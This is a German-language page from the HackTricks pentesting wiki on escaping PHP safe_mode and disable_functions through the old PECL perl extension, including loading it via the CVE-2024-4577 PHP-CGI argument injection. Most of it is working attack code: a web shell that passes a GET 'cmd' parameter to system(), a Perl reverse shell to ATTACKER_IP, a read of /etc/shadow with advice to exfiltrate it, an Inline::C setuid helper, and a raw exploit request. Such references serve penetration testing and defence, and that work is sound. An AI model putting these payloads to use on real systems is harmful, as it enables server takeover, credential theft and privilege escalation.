PHP Perl Extension Safe_mode Bypass Exploit

Tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks

Hintergrund

Das als CVE-2007-4596 bekannte Problem stammt von der veralteten perl PHP-Erweiterung, die einen vollständigen Perl-Interpreter einbettet, ohne die PHP-Kontrollen safe_mode, disable_functions oder open_basedir zu beachten. Jeder PHP-Worker, der extension=perl.so lädt, erhält uneingeschränkten Perl-eval, sodass die Ausführung von Befehlen trivial bleibt, selbst wenn alle klassischen PHP-Prozess-startenden Primitiven blockiert sind. Obwohl safe_mode in PHP 5.4 entfiel, liefern viele veraltete Shared-Hosting-Stacks und verwundbare Labs es weiterhin aus, weshalb dieser Bypass noch immer wertvoll ist, wenn man auf Legacy-Control-Panels landet.

Kompatibilität & Packaging-Status (2025)

  • Die letzte PECL-Version (perl-1.0.1, 2013) richtet sich an PHP ≥5.0; PHP 8+ schlägt in der Regel fehl, weil sich die Zend APIs geändert haben.
  • PECL wird durch PIE ersetzt, aber ältere Stacks liefern weiterhin PECL/pear aus. Verwende den untenstehenden Ablauf für PHP 5/7-Ziele; bei neueren PHP-Versionen muss man erwarten, dass man downgraden oder zu einem anderen Injection-Pfad wechseln muss (z. B. userland FFI).

Erstellen einer testbaren Umgebung in 2025

  • Hole perl-1.0.1 von PECL, kompiliere es für den PHP-Branch, den du angreifen willst, und lade es global (php.ini) oder via dl() (falls erlaubt).
  • Kurzes Debian-basiertes Lab-Rezept:
sudo apt install php5.6 php5.6-dev php-pear build-essential
sudo pecl install perl-1.0.1
echo "extension=perl.so" | sudo tee /etc/php/5.6/mods-available/perl.ini
sudo phpenmod perl && sudo systemctl restart apache2
  • Während der Exploitation die Verfügbarkeit mit var_dump(extension_loaded('perl')); oder print_r(get_loaded_extensions()); bestätigen. Falls abwesend, nach perl.so suchen oder beschreibbare php.ini/.user.ini-Einträge missbrauchen, um es zu erzwingen.
  • Da der Interpreter im PHP-Worker lebt, werden keine externen Binaries benötigt — ausgehende Netzwerkfilter oder proc_open-Blacklists spielen keine Rolle.

Build-Chain auf dem Host, wenn phpize erreichbar ist

Wenn phpize und build-essential auf dem kompromittierten Host vorhanden sind, kannst du perl.so kompilieren und ablegen, ohne Shell-Befehle an das OS auszuführen:

# grab the tarball from PECL
wget https://pecl.php.net/get/perl-1.0.1.tgz
tar xvf perl-1.0.1.tgz && cd perl-1.0.1
phpize
./configure --with-perl=/usr/bin/perl --with-php-config=$(php -r 'echo PHP_BINARY;')-config
make -j$(nproc)
cp modules/perl.so /tmp/perl.so
# then load with a .user.ini in the webroot if main php.ini is read-only
echo "extension=/tmp/perl.so" > /var/www/html/.user.ini

Wenn open_basedir erzwungen ist, stelle sicher, dass die abgelegte .user.ini und .so in einem erlaubten Pfad liegen; die extension=-Direktive wird innerhalb des basedir weiterhin beachtet. Der Kompilierungsablauf spiegelt das PHP manual zum Erstellen von PECL extensions wider.

Original PoC (NetJackal)

From http://blog.safebuff.com/2016/05/06/disable-functions-bypass/, nach wie vor praktisch, um zu bestätigen, dass die extension auf eval reagiert:

<?php
if(!extension_loaded('perl'))die('perl extension is not loaded');
if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls';
$perl=new perl();
echo "<textarea rows='25' cols='75'>";
$perl->eval("system('".$_GET['cmd']."')");
echo "&lt;/textarea&gt;";
$_GET['cmd']=htmlspecialchars($_GET['cmd']);
echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>";
?>

Moderne Payload-Verbesserungen

1. Vollständiges TTY über TCP

Der eingebettete Interpreter kann IO::Socket laden, auch wenn /usr/bin/perl blockiert ist:

$perl = new perl();
$payload = <<<'PL'
use IO::Socket::INET;
my $c = IO::Socket::INET->new(PeerHost=>'ATTACKER_IP',PeerPort=>4444,Proto=>'tcp');
open STDIN,  '<&', $c;
open STDOUT, '>&', $c;
open STDERR, '>&', $c;
exec('/bin/sh -i');
PL;
$perl->eval($payload);

2. File-System Escape auch mit open_basedir

Perl ignoriert PHPs open_basedir, sodass du beliebige Dateien lesen kannst:

$perl = new perl();
$perl->eval('open(F,"/etc/shadow") || die $!; print while <F>; close F;');

Leite die Ausgabe über IO::Socket::INET oder Net::HTTP, um exfiltrate data, ohne PHP-verwaltete Deskriptoren zu berühren.

3. Inline-Kompilierung für Privilege Escalation

Wenn Inline::C systemweit vorhanden ist, kompiliere Helfer innerhalb der Anfrage, ohne dich auf PHP’s ffi oder pcntl zu verlassen:

$perl = new perl();
$perl->eval(<<<'PL'
use Inline C => 'DATA';
print escalate();
__DATA__
__C__
char* escalate(){ setuid(0); system("/bin/bash -c 'id; cat /root/flag'"); return ""; }
PL
);

4. Living-off-the-Land Enumeration

Behandle Perl als LOLBAS-Toolkit — z. B. MySQL DSNs ausgeben, selbst wenn mysqli fehlt:

$perl = new perl();
$perl->eval('use DBI; @dbs = DBI->data_sources("mysql"); print join("\n", @dbs);');

2024+ Missbrauch: Laden von perl.so via PHP-CGI Argument Injection (CVE-2024-4577)

Bei Windows-Installationen, die weiterhin PHP-CGI exponieren, erlaubt die 2024 argument-injection regression (CVE-2024-4577) das Übergeben beliebiger -d-Optionen an den Interpreter. Das bedeutet, dass Sie die Perl-Erweiterung laden können, selbst wenn dl() deaktiviert ist und php.ini schreibgeschützt ist:

  • Erstellen oder hochladen Sie eine kompatible perl.dll/perl.so in einen webschreibbaren Pfad (z. B. C:\xampp\htdocs\temp\perl.dll).
  • Senden Sie eine einzige HTTP-Anfrage, die -d extension=C:\\xampp\\htdocs\\temp\\perl.dll injiziert und im selben Request-Body eine Perl-backed payload:
POST /?%ADd+extension=C:\\xampp\\htdocs\\temp\\perl.dll+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: victim
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

<?php $p=new perl(); $p->eval("system('whoami && hostname')"); ?>

Weil der PHP worker jetzt Perl einbettet, bevor er den Body liest, werden alle klassischen disable_functions/open_basedir-Kontrollen umgangen. Das funktioniert auf verwundbaren Windows/CGI-Stacks, bis es gepatcht wird (PHP 8.1.29/8.2.20/8.3.8 und spätere Versionen schließen die Regression). Wenn open_basedir den DLL-Pfad blockiert, lege die Datei zuerst in das erlaubte base dir ab oder nutze einen vorhandenen world-readable DLL path, der mit XAMPP ausgeliefert wird.

References

Tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks